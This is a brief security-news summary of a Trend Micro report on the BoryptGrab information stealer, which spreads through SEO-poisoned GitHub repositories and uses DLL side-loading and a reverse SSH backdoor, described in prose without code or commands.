Trend Micro discovered a campaign utilizing more than 100 GitHub repositories to distribute the BoryptGrab information stealer. This malware targets a wide range of sensitive data, including browser credentials, cryptocurrency wallets, system information, and personal files, often deploying a reverse SSH tunnel for persistent attacker access.
The threat actors behind BoryptGrab leverage the reputation of GitHub to host malicious ZIP archives disguised as legitimate software tools, utilities, and video game cheats. By saturating repository README files with strategic SEO keywords, the attackers ensure their malicious links appear high in search engine results. One documented example involves a deceptive Voicemod Pro page that redirects users through a series of encoded URLs before delivering the final infected payload.
Upon execution, the malware typically relies on DLL side-loading to bypass security measures. In many instances, a legitimate executable is used to load a malicious library file, which then decrypts and launches the primary payload. Some variants go a step further by installing a secondary backdoor known as TunnesshClient. This component establishes a covert communication channel that allows attackers to maintain control over the compromised system.
Technical analysis of the infection chain revealed a sophisticated distribution network where numerous repositories share the same underlying logic and tracking mechanisms. The researchers noted that many of the ZIP file naming conventions explicitly target users searching for cracked software or gaming enhancements. This high-volume approach allows the campaign to remain resilient even if individual repositories are flagged and removed by platform moderators.
Evidence gathered from the campaign’s infrastructure and the presence of Russian-language comments within the source code suggest the threat actors may be of Russian origin. The malware is capable of exfiltrating data to remote servers while simultaneously monitoring the victim’s activity. As the campaign continues to evolve, the reuse of specific delivery patterns highlights a calculated effort to exploit public trust in open-source hosting platforms.
Source: Massive GitHub Malware Campaign Spreads BoryptGrab Password-Stealing Malware